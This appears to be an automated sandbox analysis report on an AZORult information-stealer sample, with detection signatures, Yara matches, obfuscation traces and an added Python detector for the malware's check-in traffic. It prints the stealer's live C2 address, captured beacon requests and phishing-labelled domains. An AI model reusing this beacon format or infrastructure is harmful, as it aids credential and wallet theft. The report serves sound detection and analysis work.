Windows Analysis Report 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Overview

General Information

Sample Name: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Analysis ID: 491841
MD5: 73bd76f0549cc1992d943ddfd92a9c4d
SHA1: 802e70b76c7c0860b3a4a257b1bc96fc3430ff01
SHA256: 2f530a45e4acf58d16dad1b1e23b5b1419ba893c2f76f6625da3acb86933462f
Tags: AZORult, exe

Detection

AZORult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Detected AZORult Info Stealer
Yara detected Azorult Info Stealer
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Avira: detected
Found malware configuration
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp Malware Configuration Extractor: Azorult {"C2 url": "http://admin.svapofit.com/azs/index.php"}
Multi AV Scanner detection for submitted file
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Virustotal: Detection: 68%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe ReversingLabs: Detection: 75%
Antivirus detection for URL or domain
Source: http://ww1.survey-smiles.com/% Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/e Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/z Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/sof Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/ Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: admin.svapofit.com Virustotal: Detection: 9%
Source: survey-smiles.com Virustotal: Detection: 7%
Source: ww1.survey-smiles.com Virustotal: Detection: 8%
Machine Learning detection for sample
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040A610 CryptUnprotectData,LocalFree, 0_2_0040A610

Compliance:

Uses 32bit PE files
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 0_2_00413030
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 0_2_004119A8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 0_2_004119AC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 0_2_00412D6C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 0_2_0041160C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49862 -> 63.141.242.43:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://admin.svapofit.com/azs/index.php
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  POST /azs/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: admin.svapofit.com
  Content-Length: 101
  Cache-Control: no-cache
  Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d
  Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Cache-Control: no-cache
  Host: survey-smiles.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Cache-Control: no-cache
  Connection: Keep-Alive
  Host: ww1.survey-smiles.com
  Cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NOCIXUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.59.242.153
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://admin.svapofit.=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://admin.svapofit.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544541498.0000000000714000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.544083881.0000000002130000.00000004.00000001.sdmp String found in binary or memory: http://admin.svapofit.com/azs/index.php
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://admin.svapofit.com/azs/index.php8
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://admin.svapofit.com/azs/index.phpSb
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: http://ip-api.com/json
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://survey-smiles.c-k
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp String found in binary or memory: http://survey-smiles.com
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp String found in binary or memory: http://survey-smiles.com/=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://survey-smiles.com/csvc
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/e
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/sof
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/z
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: http://www.icq.com/legal/eula/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: http://www.icq.com/legal/privacypolicy/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: https://dotbit.me/a/
Source: unknown HTTP traffic detected:
  POST /azs/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: admin.svapofit.com
  Content-Length: 101
  Cache-Control: no-cache
  Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d
  Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Source: unknown DNS traffic detected: queries for: admin.svapofit.com
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle, 0_2_00417D84
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Cache-Control: no-cache
  Host: survey-smiles.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Cache-Control: no-cache
  Connection: Keep-Alive
  Host: ww1.survey-smiles.com
  Cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176
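
The check-in recorded above has a recognisable shape independent of the Snort rule: a POST to a PHP gateway, the fixed MSIE 6.0b user agent, Cache-Control: no-cache, a 101-byte mostly non-printable body and no Content-Type header. The Python below is an added example written for this report, not Joe Sandbox or AZORult code. It parses raw HTTP requests and scores them against those indicators; the C2 host, user agent and header set are taken from the capture above, the POST body is the 101 captured bytes, and the request texts, the benign control request and the three-indicator threshold are constructed for illustration.

```python
"""Score captured HTTP requests against the AZORult check-in indicators
in this report.

Added example for this report; not Joe Sandbox or AZORult code. C2 host,
user agent and header set are taken from the capture above; the sample
requests and the scoring threshold are constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List

# Indicators from the report.
C2_HOST = "admin.svapofit.com"
AZORULT_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"

# The 101-byte POST body captured in the report (Data Raw above).
CAPTURED_BODY = bytes.fromhex(
    "4a4fed3e32ed3e3c892839fe492ffb38"
    "2ffa494ced3e33ed3e3eed3e3bed3e3e"
    "ed3e33ed3e3aed3e3ded3f4e892839fd"
    "2839ff4e4e8d2839ff2839f128388c4b"
    "4ced3e3ded3e33ed3e3ded3e3aed3e3d"
    "8d28388c2839fa2839fc4e4b892839fd"
    "4f49ed3e3d"
)

# CONSTRUCTED: the check-in as a raw request, rebuilt from the headers above.
SAMPLE_CHECKIN = (
    b"POST /azs/index.php HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\n"
    b"Host: admin.svapofit.com\r\n"
    b"Content-Length: 101\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n" + CAPTURED_BODY
)
# CONSTRUCTED: the GET to survey-smiles.com that reused the same user agent.
SAMPLE_SURVEY_GET = (
    b"GET / HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Host: survey-smiles.com\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)
# CONSTRUCTED: an ordinary browser form post, used as a negative control.
SAMPLE_BENIGN = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 18\r\n\r\n"
    b"user=a&password=b!"
)


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)  # lower-cased names
    body: bytes = b""


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def score_request(req: HttpRequest) -> List[str]:
    """Return the check-in indicators a request matches, strongest first."""
    hits: List[str] = []
    if req.headers.get("host") == C2_HOST:
        hits.append("known-c2-host")
    if req.headers.get("user-agent") == AZORULT_UA:
        hits.append("azorult-user-agent")
    if req.method == "POST" and req.path.endswith("index.php"):
        hits.append("post-to-php-gateway")
    # Beacon shape: a no-cache POST that sends a body but declares no Content-Type.
    if (req.method == "POST" and req.headers.get("cache-control") == "no-cache"
            and "content-type" not in req.headers):
        hits.append("no-cache-untyped-post")
    # Encrypted check-in data: mostly non-printable bytes in the body.
    if req.body:
        printable = sum(0x20 <= b < 0x7F for b in req.body)
        if printable / len(req.body) < 0.75:
            hits.append("binary-body")
    return hits


def is_azorult_checkin(raw: bytes, min_hits: int = 3) -> bool:
    """True when enough independent indicators line up (threshold is a choice)."""
    return len(score_request(parse_request(raw))) >= min_hits


if __name__ == "__main__":
    for name, raw in [("checkin", SAMPLE_CHECKIN), ("survey", SAMPLE_SURVEY_GET),
                      ("benign", SAMPLE_BENIGN)]:
        print(name, score_request(parse_request(raw)), is_azorult_checkin(raw))
```

The survey-smiles.com GET scores only on the user agent and stays below the threshold; that single hit is still worth hunting on its own, since an MSIE 6.0b user agent from a modern Windows host is anomalous regardless of destination.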

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544526487.00000000006FA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Uses 32bit PE files
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Yara signature match
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 004034E4 appears 32 times
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Process Stats: CPU usage > 98%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Virustotal: Detection: 68%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe ReversingLabs: Detection: 75%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FF79707E-24CAA5BC7
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/3
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Static PE information: More than 200 imports for KERNEL32.dll

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Unpacked PE file: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0041A068 push 0041A08Eh; ret 0_2_0041A086
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0041A02C push 0041A05Ch; ret 0_2_0041A054
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E8D0 push 0040E905h; ret 0_2_0040E8FD
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B164 push 0040B190h; ret 0_2_0040B188
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E908 push 0040E94Ah; ret 0_2_0040E942
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B12C push 0040B158h; ret 0_2_0040B150
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040C136 push 0040C164h; ret 0_2_0040C15C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040C138 push 0040C164h; ret 0_2_0040C15C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040813C push 00408174h; ret 0_2_0040816C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004171E8 push 00417214h; ret 0_2_0041720C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040C9EA push 0040CA18h; ret 0_2_0040CA10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040C9EC push 0040CA18h; ret 0_2_0040CA10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E1A4 push 0040E1D0h; ret 0_2_0040E1C8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B1B8 push 0040B1E4h; ret 0_2_0040B1DC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E25A push 0040E288h; ret 0_2_0040E280
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E25C push 0040E288h; ret 0_2_0040E280
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00414A28 push 00414A84h; ret 0_2_00414A7C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040BAB8 push 0040BAE4h; ret 0_2_0040BADC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00409B54 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00409B78 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040D378 push 0040D3A8h; ret 0_2_0040D3A0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040D37C push 0040D3A8h; ret 0_2_0040D3A0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413B7C push 00413BA8h; ret 0_2_00413BA0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B3D8 push 0040B414h; ret 0_2_0040B40C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B3DC push 0040B414h; ret 0_2_0040B40C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004183E4 push 00418410h; ret 0_2_00418408
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040BBEC push 0040BC18h; ret 0_2_0040BC10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00409B90 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413C10 push 00413C3Ch; ret 0_2_00413C34
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00404C1C push 00404C6Dh; ret 0_2_00404C65
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B420 push 0040B44Ch; ret 0_2_0040B444
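
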